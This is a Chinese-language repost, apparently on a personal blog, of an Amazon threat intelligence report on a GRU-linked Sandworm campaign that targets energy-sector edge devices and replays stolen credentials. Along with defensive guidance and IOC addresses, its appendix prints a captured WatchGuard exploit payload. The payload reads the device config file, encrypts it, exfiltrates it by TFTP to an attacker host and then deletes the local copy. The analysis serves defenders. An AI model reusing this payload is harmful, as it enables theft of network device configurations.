亚马逊威胁情报揭秘俄方网络威胁组织对西方关键基础设施的持续攻击

亚马逊威胁情报(Amazon Threat Intelligence)发布报告,揭示了一个与俄罗斯军事情报总局(GRU)关联的威胁组织长达数年的攻击活动。该活动针对西方关键基础设施,特别是能源领域,其战术核心已从漏洞利用转向利用客户网络边缘设备的错误配置作为初始入侵途径,并通过网络流量拦截进行凭证窃取与重放攻击。

亚马逊威胁情报识别出针对西方关键基础设施的俄罗斯网络威胁组织

随着2025年接近尾声,亚马逊威胁情报正在分享关于一个由俄罗斯国家支持、持续多年的攻击活动的见解。该活动代表了关键基础设施目标攻击的一次重大演变:其战术核心已发生转变,看似配置错误的客户网络边缘设备已成为主要的初始入侵途径,而漏洞利用活动则有所减少。这种战术调整使攻击者能够实现相同的操作目标(凭证窃取和横向移动到受害组织的在线服务与基础设施中),同时降低了攻击者的暴露风险和资源消耗。

进入2026年,各组织必须优先考虑保护其网络边缘设备并监控凭证重放攻击,以抵御这种持续威胁。根据在亚马逊遥测数据中观察到的、与已知的Sandworm(也称为APT44和Seashell Blizzard)行动存在的基础设施重叠以及一致的目标模式,我们高度确信此活动集群与俄罗斯军事情报总局(GRU)有关。该活动表明了对西方关键基础设施(特别是能源领域)的持续关注,其行动从2021年持续至今。

技术细节

活动范围和目标

亚马逊威胁情报观察到在2021年至2025年间对全球基础设施的持续目标攻击,尤其关注能源领域。该活动展示了战术上的明显演变。

时间线:

  • 2021-2022年: 亚马逊 MadPot 检测到 WatchGuard 漏洞利用(CVE-2022-26318);观察到针对配置错误设备的攻击。
  • 2022-2023年: Confluence 漏洞利用(CVE-2021-26084, CVE-2023-22518);针对配置错误设备的攻击持续进行。
  • 2024年: Veeam 漏洞利用(CVE-2023-27532);针对配置错误设备的攻击持续进行。
  • 2025年: 持续针对客户网络边缘设备的配置错误进行攻击;利用 N-day/零日漏洞的活动减少。

主要目标:

  • 西方国家的能源领域组织。
  • 北美和欧洲的关键基础设施提供商。
  • 拥有云托管网络基础设施的组织。

常被攻击的资源:

  • 企业路由器和路由基础设施。
  • VPN 集中器和远程访问网关。
  • 网络管理设备。
  • 协作和 Wiki 平台。
  • 基于云的项目管理系统。

针对暴露了管理接口、可能配置错误的客户设备这一“唾手可得的果实”进行攻击,实现了相同的战略目标,即持久访问关键基础设施网络,并窃取凭证以访问受害组织的在线服务。该威胁行为者操作节奏的转变代表了一种令人担忧的演变:尽管针对客户错误配置的攻击至少从2022年就已开始,但该行为者在2025年持续关注于此活动,同时减少了对零日和 N 日漏洞利用的投入。攻击者在实现这一目标的同时,显著降低了因更易被检测的漏洞利用活动而暴露其行动的风险。

凭证窃取行动

虽然我们没有直接观察到受害组织凭证的提取机制,但多个迹象表明数据包捕获和流量分析是其主要收集方法:

  • 时间分析: 设备被攻破与针对受害者服务的认证尝试之间存在时间间隔,这表明是被动收集而非主动窃取凭证。
  • 凭证类型: 使用受害组织的凭证(而非设备凭证)访问在线服务,表明攻击者截获了用户认证流量。
  • 已知手法: Sandworm 的行动一贯涉及网络流量拦截能力。
  • 战略定位: 针对客户网络边缘设备,特意将攻击者置于可拦截传输中凭证的位置。

基础设施攻击

对托管在 AWS 上的基础设施的入侵: 亚马逊的遥测数据揭示了针对托管在 AWS 上的客户网络边缘设备的协同操作。这并非由于 AWS 的弱点,而似乎是客户设备配置错误所致。网络连接分析显示,攻击者控制的 IP 地址与运行客户网络设备软件的、已被攻破的 EC2 实例建立了持久连接。分析显示,在多个受影响的实例中存在与交互式访问和数据检索一致的持久连接。

凭证重放操作: 除了直接入侵受害者的基础设施,我们还观察到针对受害组织在线服务的系统性凭证重放攻击。在观察到的实例中,攻击者先是入侵了托管在 AWS 上的客户网络边缘设备,随后尝试使用与受害组织域名关联的凭证来认证其在线服务。尽管这些特定尝试未成功,但先入侵设备、然后使用受害者凭证进行认证的模式支持了我们的评估,即攻击者从被攻破的客户网络基础设施中窃取凭证,并用于重放攻击目标组织的在线服务。在整个2025年,攻击者的基础设施通过受害者的认证端点访问了多个关键领域组织的服务,包括:

  • 能源领域: 电力公司、能源供应商以及专注于能源领域客户的托管安全服务提供商。
  • 技术/云服务: 协作平台、源代码仓库。
  • 电信: 跨多个地区的电信供应商。

地理分布: 攻击目标遍及全球:

  • 北美
  • 欧洲(西部和东部)
  • 中东 该活动显示出对能源领域供应链的持续关注,包括直接运营商和能够访问关键基础设施网络的第三方服务提供商。

活动流程:

  1. 入侵托管在 AWS 上的客户网络边缘设备。
  2. 利用原生的数据包捕获功能。
  3. 从截获的流量中窃取凭证。
  4. 将凭证重放以攻击受害组织的在线服务和基础设施。
  5. 建立持久访问以实现横向移动。

与“Curly COMrades”的基础设施重叠

亚马逊威胁情报识别出威胁行为者的基础设施与 Bitdefender 追踪为“Curly COMrades”的团体存在重叠。我们评估这可能代表了一个更广泛的 GRU 活动中的互补性操作:

  • Bitdefender的报告: 侧重于入侵后的基于主机的手法(滥用 Hyper-V 以规避 EDR,定制恶意软件 CurlyShell/CurlCat)。
  • 亚马逊的遥测数据: 侧重于初始入侵途径和云环境渗透方法。 这种潜在的操作分工(一个集群专注于网络访问和初始入侵,另一个处理基于主机的持久化和规避)符合 GRU 的运作模式,即专门的子集群支持更广泛的活动目标。

亚马逊的响应与破坏行动

亚马逊致力于通过积极调查和破坏复杂的威胁行为者,帮助保护客户和更广泛的互联网生态系统。

即时响应行动:

  • 识别并通知了受影响客户其网络设备资源已被入侵。
  • 促使受感染的 EC2 实例得到立即修复。
  • 与行业合作伙伴和受影响供应商分享了情报。
  • 向网络设备供应商报告了观察结果,以帮助支持安全调查。

破坏效果: 通过协同努力,自我们发现此活动以来,我们已经破坏了活跃的威胁行为者操作,并减少了该威胁活动子集群可用的攻击面。我们将继续与安全社区合作,共享情报并共同防御针对关键基础设施的国家级威胁。

保护您的组织

2026年的优先行动

组织应主动监控此类活动模式的迹象:

  1. 网络边缘设备审计

    • 审计所有网络边缘设备,查找异常的数据包捕获文件或工具。
    • 检查设备配置是否存在暴露的管理接口。
    • 实施网络分段以隔离管理接口。
    • 强制执行强身份验证(消除默认凭证,实施多因素认证)。

  2. 凭证重放检测

    • 检查认证日志,查找网络设备管理接口与在线服务之间凭证重用的情况。
    • 监控来自意外地理位置的认证尝试。
    • 针对组织在线服务的认证模式实施异常检测。
    • 审查任何疑似设备被入侵后更长的时间窗口,以发现延迟的凭证重放尝试。

  3. 访问监控

    • 监控来自意外源 IP 对路由器/设备管理门户的交互式会话。
    • 检查网络设备管理接口是否无意中暴露在互联网上。
    • 审计是否使用了可能暴露凭证的明文协议(Telnet、HTTP、未加密的 SNMP)。

  4. IOC 审查

    • 能源领域组织和关键基础设施运营商应优先审查访问日志,查找来自下方列出的 IOC 的认证尝试。

AWS 特定建议

对于 AWS 环境,请实施以下防护措施:

身份和访问管理:

  • 尽可能使用身份提供商和 IAM 角色通过身份联合来管理对 AWS 资源和 API 的访问。
  • 更多信息,请参阅 IAM 用户指南中的 [创建 IAM 策略]。

网络安全:

  • 为安全组实施最小权限规则。
  • 将管理接口隔离在具有堡垒主机访问权限的私有子网中。
  • 启用 VPC 流日志以进行网络流量分析。

漏洞管理:

  • 使用 Amazon Inspector 自动发现和扫描 Amazon EC2 实例的软件漏洞和意外网络暴露。
  • 更多信息,请参阅 [Amazon Inspector 用户指南]。
  • 定期修补、更新和保护实例上的操作系统及应用程序。

检测与监控:

  • 启用 AWS CloudTrail 以监控 API 活动。
  • 配置 Amazon GuardDuty 进行威胁检测。
  • 检查认证日志以发现凭证重放模式。

入侵指标

IOC 值 IOC 类型 首次发现 最后发现 注释
91.99.25[.]54 IPv4 2025-07-02 Present 被入侵的合法服务器,用于代理威胁行为者流量
185.66.141[.]145 IPv4 2025-01-10 2025-08-22 被入侵的合法服务器,用于代理威胁行为者流量
51.91.101[.]177 IPv4 2024-02-01 2024-08-28 被入侵的合法服务器,用于代理威胁行为者流量
212.47.226[.]64 IPv4 2024-10-10 2024-11-06 被入侵的合法服务器,用于代理威胁行为者流量
213.152.3[.]110 IPv4 2023-05-31 2024-09-23 被入侵的合法服务器,用于代理威胁行为者流量
145.239.195[.]220 IPv4 2021-08-12 2023-05-29 被入侵的合法服务器,用于代理威胁行为者流量
103.11.190[.]99 IPv4 2021-10-21 2023-04-02 被入侵的合法暂存服务器,用于窃取 WatchGuard 配置文件
217.153.191[.]190 IPv4 2023-06-10 2025-12-08 长期用于侦察和目标定位的基础设施

注意: 所有已识别的 IP 均为被入侵的合法服务器,可能服务于攻击者的多个目的或继续进行合法运营。组织应调查任何匹配项的具体上下文,而非自动屏蔽。我们在列出的时间段内观察到这些 IP 专门访问路由器管理接口并尝试认证在线服务。

技术附录:CVE-2022-26318 漏洞利用负载

以下是亚马逊 MadPot 在 2022 年 WatchGuard 漏洞利用活动中捕获的负载:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

from cryptography.fernet import Fernet
import subprocess
import os

key = uVrZfUGeecCBHhFmn1Zu6ctIQTwkFiW4LGCmVcd6Yrk='
with open('/etc/wg/config.xml’, ‘rb’) as config_file:
    buf = config_file.read()

fernet = Fernet(key)
enc_buf = fernet.encrypt(buf)

with open('/tmp/enc_config.xml’, ‘wb’) as encrypted_config:
    encrypted_config.write(enc_buf)

subprocess.check_output([tftp, '-p’, '-l, '/tmp/enc_config.xml’, '-r,
    '[REDACTED].bin’, ‘103.11.190[.]99'])

os.remove('/tmp/enc_config.xml’)

此负载展示了攻击者的方法:加密窃取的配置数据,通过 TFTP 外泄到被入侵的暂存基础设施,并清除取证证据。

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次